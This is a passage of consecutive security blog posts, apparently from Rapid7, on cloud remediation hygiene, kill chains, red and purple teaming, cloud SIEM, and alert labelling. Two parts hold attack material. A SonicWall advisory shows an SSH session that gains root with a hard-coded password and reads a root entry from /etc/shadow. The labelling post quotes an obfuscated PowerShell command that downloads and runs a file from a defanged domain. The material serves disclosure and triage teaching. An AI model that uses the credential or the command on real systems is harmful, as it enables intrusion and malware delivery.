Deactivate them. If they’re old, that is. Since API keys essentially authenticate traffic for 2 things that really need to talk to each other, it’s a good rule of thumb to regularly and continually “rotate” your API keys so that anyone—or anything—with malicious intent is kept guessing. This is probably the most obvious hygiene action we’ll discuss here. The AWS Secrets Manager platform enables:

  • Creation and protection of “secrets” that manage API keys
  • Rotation of API keys
  • Auditing of credential rotation for your cloud resources
  • Scheduled/automatic rotation of keys, aka secrets

Delete the nondescriptors

Those newly provisioned Security Group (SG) rules may not have a description. Why would that be? When found, it doesn’t really matter. They’re liabilities and they should be deleted. SG rules allow you to really get into the fine-grained nitty gritty of control over the traffic moving in and out of instances on your cloud infrastructure.

If an SG rule is indeed newly provisioned and lacks a descriptor, odds are it isn’t a priority and workflow isn’t dependent on it. Security Group rules are supposed to simplify operations, so if it does the opposite of that by being a mystery, then simplify it by getting rid of it.      

Tear up the untagged

More to the point, it’s another good hygiene rule of thumb to delete instances that aren’t properly tagged. The whole point of tagging, much like adding descriptions, is to quickly categorize and find all of your many resources. Thus, if something isn’t tagged as it should be or you stumble upon an instance that is wholly untagged, then it’s time for it to go. But as stated in this AWS tagging guide, you must be specific about your deletion process:

You can’t terminate, stop, or delete a resource based solely on its tags; you must specify the resource identifier. For example, to delete snapshots that you tagged with a tag key called DeleteMe, you must use the DeleteSnapshots action with the resource identifiers of the snapshots, such as snap-1234567890abcdef0.

Privatize public buckets

As AWS also states, new S3 buckets do not allow public access. However, much like the context surrounding the suggestions above, somewhere along the way public access was granted for one reason or another, and vulnerabilities were created. So here’s another good hygiene rule of thumb: zero out Access Control Lists (ACLs); they’re what you would use to grant public access to buckets. It’s also a good idea to activate all “block public access” settings.

Ready to rock (automated) remediation?

If your team is ready to activate automated remediation, good for you. Learning all 4 levels of automated remediation will also allow your organization to gradually become acquainted with the process and ultimately strengthen your cloud security.

The 4 Levels: Read an overview

Automated remediation level 3: Governance and hygiene

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/28/automated-remediation-level-3-governance-and-hygiene/

Mold it, make it, just don’t fake it

Automated remediation level 3: Governance and hygiene

At a quick glance, it seems like the title of this blog is “government hygiene.” Most likely, that wouldn’t be a particularly exciting read, but we’re hoping you might be engaged enough to gain a few takeaways from this fourth piece in our series on automating remediation and how it can benefit your team and cost center.

The best way to mold a solution that makes sense for your company and cloud security is by adding actions that cause the fewest deviations in your day-to-day operations. Of course, there are several best-practice use cases that can make sense for your organization. Let’s take a look at a few so you can decide which one(s) work(s) for you.

Environment enforcement

Sandboxes are designed to be safe spaces, so they should also be clean spaces. As Software Development Life Cycles (SDLC) accelerate and security posture moves increasingly left into the hands of the developers spinning things up, it’s important to not only isolate and lock down your sandbox space, but to create a repeat cleaning schedule. Your software release cycle can also act as regularly scheduled sandbox maintenance.

No exemptions for expensive instances

Spinning up instances that suck up resources from other critical applications can cost you. Sometimes they’re necessary, often they’re not. Whether it’s by cost, family type, or hardware specs, continuous monitoring is key so that even when unnecessarily resource-intensive processes aren’t automatically killed, you still have a good idea of what’s costing too much time and too much money. AWS CloudWatch, for instance, can help you monitor EC2 instances by stopping and starting them at scheduled intervals.

Cleanliness ≠ costliness

Properly automating anything in cloud security is ultimately going to save money for the organization. But, as we’ve discussed to some extent above and throughout this series, you’ll want to make sure automation isn’t creating unnecessary instances, orphaning outdated resources, or stagnating old snapshots and unused databases. Yep, there are a lot of things that can start to add up and begin puffing out a budget. Creating more efficient data pipelines and discovering which parts of the remediation process are the most labor-intensive can help identify where you should focus effort and resources. In this way, you can begin to target those areas that will require the most regular hygiene and cleanup.

Put a cork in the port (exposure)

Since everything on the internet is communicated and transferred via ports, it’s probably a good idea to think about locking down exposed ports that may be running protocols like Secure Shell (SSH) or Remote Desktop (RDP). Automating this type of cleanup will require knowing, similar to the above section, which ports do most of the heavy lifting in the daily rhythms of your cloud -security operations. If a port isn’t being used in a meaningful way — or you simply don’t have any idea what its use is — best to shut it down.

Stay vigilant while basking in benefits

Ensuring you’re getting the most organized automation framework as possible takes work, but it’s considerably less work than if you had no framework at all. Automating good governance and hygiene practices can add time saved to the overall benefits gained from this work. But, we must all be good monitors of these processes and put checks in place to ensure your automation framework actually works for you and continues to save time and effort for years to come.

With that, we’re ready for a deep-dive into the final of 4 Levels of Automated Remediation. You can also read the previous entry in this series here.  

Level 4 coming soon!

Kill Chains: Part 3→What’s Next

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/25/kill-chains-part-3-whats-next/

Kill Chains: Part 3→What’s Next

Life, the Universe, and Kill Chains

As the final entry in this blog series, we want to quickly recap what we have previously discussed and also look into the possible future of kill chains. If you haven’t already done so, please make sure to read the previous 2 entries in this series: Kill chains: Part 1→Strategic and operational value, and Kill chains: Part 2 →Strategic and tactical use cases.

Fun with Graphs

In an effort to save time (and your sanity) I’ve created the following graph to illustrate the differences between the different kill chains:

Kill Chains: Part 3→What’s Next

What’s the bottom line? To paraphrase a line from the film The Gentlemen, “for (almost) every use case there is a kill chain, and for every kill chain a strategy.” Focused on malware defense or security awareness? The Cyber Kill Chain is worth a look. Need to assess your operational capabilities? MITRE ATT&CK. Looking to accurately model the behavior of attackers? Unified Kill Chain is “the way” (#mandalorian).

The Future

The kill chains of today (Lockheed Martin Cyber Kill Chain, MITRE ATT&CK, Unified Kill Chain) can trace their origins to a model first proposed by the military in the late 1990’s known as F2T2EA (find, fix, track, target, engage, and assess). However, as we all know, attackers and their attacks evolve over time—and the rate at which they are evolving continues to accelerate. Since our kill chains evolved from military strategy, it only makes sense to look at what’s happened in military strategy since the 90s to get a glimpse of where the evolution of the cyber kill chains may be heading.

A newer model used by special operators is F3EAD (find, fix, finish, exploit, analyze, and disseminate). Let’s take a quick look at how this applies to cyber operations:

  • Find: Ask “who, what, where, when, why” when looking at an event
  • Fix: Verify what was discovered in the previous phase (true positive / false positive)
  • Finish: Use the information from the previous 2 phases to determine a course of action and degrade/eliminate the threat
  • Exploit: Identify IOCs using information from the previous phases
  • Analyze: Fuse your self-generated intelligence with third-party sources to identify any additional anomalous activity occurring in the environment
  • Disseminate: Distribute the results of the previous phases within the Security Operations Center (SOC) and to additional key stakeholders

One thing missing from the F3EAD model when applied to cyber operations is the inclusion of automation, aka Security Orchestration and Automation and Response (SOAR). The gains in efficiency can greatly increase the speed at which the finish, exploit, and analyze phases can be completed. The first two phases, find and fix, are something I believe still requires the human touch due to the “fuzzy” (aka contextual) nature of events occurring within an organization.

The TLDR of the above? The future of kill chains must include the fusion of intelligence and automation without removing the human element from the equation. Until the equivalent of Skynet is invented, e.g. a truly sentient version of artificial intelligence capable of thinking in abstract ways, the “gut feeling” an analyst or incident responder gets when examining data will continue to be an advantage for us regular humans. Pairing this with the unmatched efficiency and speed gained by utilizing SOAR = winning!

The Verdict

Kill chains represent a comprehensive way to think about and visualize cyber attacks. Being able to communicate using a common lexicon (i.e. the terms and concepts in a kill chain) is critical to helping all levels of your organization understand the importance of security. However, I fear another fracturing of our lexicon will occur as more and newer versions of kill chains are introduced. Additionally, there appears to be an overreliance on only detecting and preventing the Tactics, Techniques, and Procedures (TTPs) found within these frameworks. Attackers have proven to be incredibly creative and endlessly resourceful, so their TTPs are going to change and evolve in ways we cannot yet imagine. This doesn’t mean we should discount the importance of using kill chains as part of our toolkit, but it should remain a part of our kit, and not the gold standard by which we judge the effectiveness of the security programs we have created.  

——————

Jeffrey Gardner, Practice Advisor for Detection and Response at Rapid7, recently presented a deep dive into all things kill chain. In it, he discusses how these methodologies can help your security organization cut down on threats and drastically reduce breach response times. You can also read the previous entries in this series for a general overview of kill chains and the specific frameworks we’ve discussed.

Watch the webcast now

Go back and read Part 1→Strategic and operational value, or Part 2 →Strategic and tactical use cases

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null [email protected]
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
[email protected]'s password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic to allow for malicious email to pass undetected to further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

Attack Surface Analysis Part 3: Red and Purple Teaming

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/22/attack-surface-analysis-part-3-red-and-purple-teaming/

Part 3: Red and Purple Teaming

Attack Surface Analysis Part 3: 
Red and Purple Teaming

This is the third and final installment in our 2021 series around attack surface analysis. In part 1 I offered a description and the value and challenge of vulnerability assessment. Part 2 explored the why and how of conducting penetration testing and gave some tips on what to look for when planning an engagement. In this installment I’ll detail the final 2 analysis techniques—red and purple teaming.

Previously, we rather generically defined a red team engagement as a capabilities assessment. Time to get a little more specific with our terminology with a better definition, once again courtesy of NIST:

“A [red team is a] group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The Red Team’s objective is to improve enterprise cybersecurity by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.”

(Source: https://csrc.nist.gov/glossary/term/Red_Team)

If you’re scratching your head about now thinking “well, that sounds awful similar to a pentest,” I’ve put together the following table to help really illustrate the differences:

Attack Surface Analysis Part 3: 
Red and Purple Teaming

Additionally, like the various methodologies available for pentesting, red teams have different options in how they perform their engagements. The most common methodology that many of you have no doubt heard of is the MITRE ATT&CK framework, but there are others out there. Each of the options below has a different focus, whether it be red teaming for financial services or threat intel-based red teaming, so there is a flavor available to meet your needs:

  1. TIBER-EU—Threat Intelligence-Based Ethical Red Teaming Framework
  2. CBEST—Framework originating in the UK
  3. iCAST—Intelligence-Led Cyber Attack Simulation Testing
  4. FEER—Financial Entities Ethical Red Teaming
  5. AASE—Adversarial Attack Simulation Exercises
  6. NATO—CCDCOE red team framework

You may be thinking, “There’s no way I can stand up an internal red team, and I don’t have the budget for a professional engagement, but I would really like to test my blue team. How can I do this on my own!?” Well, you don’t have to! There are plenty of open source tools available to help you take that first step. While the following tools are nowhere near as capable or extensive as a human-led team, they do give a number of useful insights into potential weaknesses in your detection and response capabilities:

  1. APTSimulator—Batch script for Windows that makes it look as if a system were compromised
  2. Atomic Red Team—Detection tests mapped to the MITRE ATT&CK framework
  3. AutoTTP—Automated Tactics, Techniques & Procedures
  4. Blue Team Training Toolkit (BT3)—Software for defensive security training
  5. Caldera—Automated adversary emulation system by MITRE that performs post-compromise adversarial behavior within Windows networks
  6. DumpsterFire—Cross-platform tool for building repeatable, time-delayed, distributed security events
  7. Metta—Information security preparedness tool
  8. Network Flight Simulator—Utility used to generate malicious network traffic and help teams to evaluate network-based controls and overall visibility
  9. Red Team Automation (RTA)—Framework of scripts designed to allow blue teams to test their capabilities, modeled after MITRE ATT&CK
  10. RedHunt-OS—Virtual machine loaded with a number of tools designed for adversary emulation and threat hunting

Lastly, before we head into a description of purple teaming, I want to reiterate what we’ve discussed this far. The goal of a red team engagement is not just discovering gaps in the detection and response capabilities of an organization. The purpose is to discover the blue team’s weaknesses in terms of processes, coordination, communication, etc., with the list of detection gaps being a byproduct of the engagement itself.

Purple Teaming

While the name may give away the upcoming discussion (red team + blue team = purple team), the purpose of the purple team is to enhance information sharing between both teams, not to replace or combine either team into a new entity.

  • Red Team = Tests an organization’s defensive processes, coordination, etc.
  • Blue Team = Understands attacker TTPs and designs defenses accordingly
  • Purple Team = Ensures both teams are cooperating
  • Red teams should share TTPs with the blue team
  • Blue teams should share knowledge of defensive actions with the red team

Realistically, if both of your teams are already doing this, then congratulations! You have a functional purple team. However, if you’re like me and are a fan of more form and structure, check out the illustration below:

Attack Surface Analysis Part 3: 
Red and Purple Teaming

(Source: https://github.com/DefensiveOrigins/AtomicPurpleTeam)

Seems pretty simple right? In theory it is, but in practice it gets a little more difficult (though probably not in the way you’re thinking). The biggest hurdle to effective purple teaming is helping the blue and red teams overcome the competitiveness that exists between them. Team Blue doesn’t want to give away how they catch bad guys, and Team Red doesn’t want to give away the secrets of the dark arts. By breaking down those walls you can show Blue they’re better defenders by understanding how Red operates, and Red that they can enhance their effectiveness by expanding their knowledge of defensive operations in partnership with Blue. In this way, the teams will actually want to work together (and dogs and cats will start living together, MASS HYSTERIA).

I hope the information above is helpful as you determine which analysis strategy makes sense for you! Check out the other posts in this series for more information on additional analysis techniques to take your program to the next level:

Part 1: Vulnerability Scanning                                     Part 2: Penetration Testing

Automated remediation level 2: Best practices

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/22/automated-remediation-level-2-best-practices/

A low-impact workaround

Automated remediation level 2: Best practices

When it comes to automating remediation, the second level we’ll discuss takes a bit of additional planning. This is so that users will see little to no impact in the account fundamentals automation process.  

This framework aligns with the Center for Internet Security Amazon Web Services (CIS AWS) benchmark, which helps security organizations assess and improve processes by providing a set of unbiased industry best practices. Again, planning is the key here to calibrate automation properly and maintain hygiene of your cloud security. In this second level, let’s take a look at 3 housekeeping best practices that can have a tremendous impact when it comes to automating remediation.

Organize the unused

Security groups act as a sort of traffic control checkpoint. Specifically, AWS Launch Wizard will automatically create security groups that define inbound traffic. If you’re not careful, many of these groups could go unused and subsequently become vulnerabilities. Think of it this way: if a security group isn’t attached to an instance, why would you leave it hanging around, especially if it can be exploited?

This is why it’s a good idea to perform regular maintenance of these groups. If Launch Wizard is automatically provisioning resources, then the “why” of it all should be understood by all key players  so that automation doesn’t create chaos and continues to work for you.

Delete the defaults

You should control and calibrate the rules that best suit the organization and its workflows. As such, a tip from your friendly team at Rapid7 for good housekeeping is to delete default rules for default security groups. In AWS, for example, if you don’t specify a group alignment for an instance, it’ll be assigned to the default security group. A default security group has an inbound default rule and an outbound default rule.

  • The inbound default rule opens the gates to inbound traffic from all instances aligned with a default security group.
  • The outbound default rule grants permission to all outbound traffic from any instance aligned with the same default security group.  

Ensuring you have maximum control and visibility over that inbound and outbound traffic is just good hygiene, and will put checks on the process of creating default instances and any rules associated with them.

Protect AMI privacy

Ensuring the privacy status of an Amazon Machine Image (AMI) is also good hygiene. Essentially, setting an AMI to private enables individual access—so you and only you can use it—or you can assign access privileges to a specific list. This crucial step continues the best practice of closing your monitoring and cloud-security loops to fit the needs of your organization.

Stay in best-practice mode

If it seems like these 3 routines and rhythms are fundamentals of configuring automated remediation, that’s because they are. The thing is—and here’s another mention of the word—constant calibration is key in configuration processes. When there are so many details to lock into place, that’s when automation and its lasting benefits begin to make all the sense.  

With that, we’re ready for a deep-dive into the third of 4 Levels of Automated Remediation.  You can also read the previous entry in this series here.

Level 3: Governance and hygiene

Read now

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/22/how-to-combat-alert-fatigue-with-cloud-based-siem-tools/

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Today’s security teams are facing more complexity than ever before. IT environments are changing and expanding rapidly, resulting in proliferating data as organizations adopt more tools to stay on top of their sprawling environments. And with an abundance of tools comes an abundance of alerts, leading to the inevitable alert fatigue for security operations teams. Research completed by Enterprise Strategy Group determined 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50. That means thousands (or tens of thousands!) of alerts daily, depending on the organization’s size.

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM. Here are a few key ways a cloud-based SIEM can help combat alert fatigue to accelerate threat detection and response.

Access all of your critical security data in one place

Traditional SIEMs focus primarily on log management and are centered around compliance instead of giving you a full picture of your network. The rigidity of these outdated solutions is the opposite of what today’s agile teams need. A cloud SIEM can unify diverse data sets across on-premises, remote, and cloud environments, to provide security operations teams with the holistic visibility they need in one place, eliminating the need to jump in and out of multiple tools (and the thousands of alerts that they produce).

With modern cloud SIEMs like Rapid7’s InsightIDR, you can collect more than just logs from across your environment and ingest data including user activity, cloud, endpoints, and network traffic—all into a single solution. With your data in one place, cloud SIEMs deliver meaningful context and prioritization to help you avoid an abundance of alerts.

Cut through the noise to detect attacks early in the attack chain

By analyzing all of your data together, a cloud SIEM uses machine learning to better recognize patterns in your environment to understand what’s normal and what’s a potential threat. The result? More fine-tuned detections so your team is only alerted when there are real signs of a threat.

Instead of bogging you down with false positives, cloud SIEMs provide contextual, actionable alerts. InsightIDR offers customers high-quality, out-of-the-box alerts created and curated by our expert analysts based on real threats—so you can stop attacks early in the attack chain instead of sifting through a mountain of data and worthless alerts.

Accelerate response with automation

With automation, you can reduce alert fatigue and further improve your SOC’s efficiency. By leveraging a cloud SIEM that has built-in automation, or has the ability to integrate with a security orchestration and automation (SOAR) tool, your SOC can offload a significant amount of their workload and free up analysts to focus on what matters most, all while still improving security posture.

A cloud SIEM with expert-driven detections and built-in automation enables security teams to respond to and remediate attacks in a fraction of the time, instead of manually investigating thousands of alerts. InsightIDR integrates seamlessly with InsightConnect, Rapid7’s security orchestration and automation response (SOAR) tool, to reduce alert fatigue, automate containment, and improve investigation handling.

With holistic network visibility and advanced analysis, cloud-based SIEM tools provide teams with high context alerts and correlation to fight alert fatigue and accelerate incident detection and response. Learn more about how InsightIDR can help eliminate alert fatigue and more by checking out our outcomes pages.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Why More Teams are Shifting Security Analytics to the Cloud This Year

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/17/why-more-teams-are-shifting-security-analytics-to-the-cloud-this-year/

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed. An ESG study found that 63% of organizations say security is more difficult than it was two years ago. Teams cite the growing attack surface, increasing alerts, and bandwidth as key reasons.

For their research, ESG surveyed hundreds of IT and cybersecurity professionals to gain more insights into strategies for driving successful security analytics and operations. Read the highlights of their study below, and check out the full ebook, “The Rise of Cloud-Based Security Analytics and Operations Technologies,” here.

The attack surface continues to grow as cloud adoption soars

Many organizations have been adopting cloud solutions, giving teams more visibility across their environments, while at the same time expanding their attack surface. The trend toward the cloud is only continuing to increase—ESG’s research found that 82% of organizations are dedicated to moving a significant amount of their workload and applications to the public cloud. The surge in remote work over the past year has arguably only amplified this, making it even more critical for teams to have detection and response programs that are more effective and efficient than ever before.

Organizations are looking toward consolidation to streamline incident detection and response

ESG found that 70% of organizations are using a SIEM tool today as well as an assortment of other other point solutions, such as an EDR or Network Traffic Analysis solution. While this fixes the visibility issue plaguing security teams today, it doesn’t help with streamlining detection and response, which is likely why 36% of cybersecurity professionals say integrating disparate security analytics and operations tools is one of their organization’s highest priorities. Consolidating solutions drastically cuts down on false-positive alerts, eliminating the noise and confusion of managing multiple tools.

Combat complexity and drive efficiency with the right cloud solution

A detection and response solution that can correlate all of your valuable security data in one place is key for accelerated detection and response across the sprawling attack surface. Rapid7’s InsightIDR provides advanced visibility by automatically ingesting data from across your environment—including logs, endpoints, network traffic, cloud, and use activity—into a single solution, eliminating the need to jump in and out of multiple tools and giving hours back to your team. And with pre-built automation workflows, you can take action directly from within InsightIDR.

See ESG’s findings on cloud-based solutions, automation/orchestration, machine learning, and more by accessing “The Rise of Cloud-Based Security Analytics and Operations Technologies” ebook.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Monitor Google Cloud Platform (GCP) Data With InsightIDR

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/16/monitor-google-cloud-platform-gcp-data-with-insightidr/

Monitor Google Cloud Platform (GCP) Data With InsightIDR

InsightIDR was built in the cloud to support dynamic and rapidly changing environments—including remote workers, hybrid cloud and on-premises architectures, and fully cloud environments. Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly more dispersed security environments. According to the 2020 IDG Cloud Computing Survey, 92% of organization’s IT environments are at least somewhat cloud today, and more than half use multiple public clouds.

Google Cloud Platform (GCP) is one of the top cloud providers in 2021, and is trusted by leading companies across industries to help monitor their multi-cloud or hybrid environments. With a wide reach—GCP is available in over 200 countries and territories—it’s no wonder why.

To further provide support and monitoring capabilities for our customers, we recently added Google Cloud Platform (GCP) as an event source in InsightIDR. With this new integration, you’ll be able to collect user ingress events, administrative activity, and log data generated by GCP to monitor running instances and account activity within InsightIDR. You can also send firewall events to generate firewall alerts in InsightIDR, and threat detection logs to generate third-party alerts.

This new integration allows you to collect GCP data alongside your other security data in InsightIDR for expert alerting and more streamlined analysis of data across your environment.

Find Google Cloud threats fast with InsightIDR

Once you add GCP support, InsightIDR will be able to see users logging in to Google Cloud as ingress events as if they were connecting to the corporate network via VPN, allowing teams to:

  • Detect when ingress activity is coming from an untrusted source, such as a threat IP or an unusual foreign country.
  • Detect when users are logging into your corporate network and/or your Google Cloud environment from multiple countries at the same time, which should be impossible and is an indicator of a compromised account.
  • Detect when a user that has been disabled in your corporate network successfully authenticates to your Google Cloud environment, which may indicate a terminated employee has not had their access revoked from GCP and is now connected to the GCP environment.

For details on how to configure and leverage the GCP event source, check out our help docs.

Looking for more cloud coverage? Learn how InsightIDR covers both Azure and AWS cloud environments.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/

Talkin’ SMAC: Alert Labeling and Why It Matters

If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is often rendered useless because the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it the malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
Talkin’ SMAC: Alert Labeling and Why It Matters

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example,  let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?

What if it’s not a threat?

However, what if upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]com command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.

Talkin’ SMAC: Alert Labeling and Why It Matters

A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!.” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting our labels to only one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we have to now do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

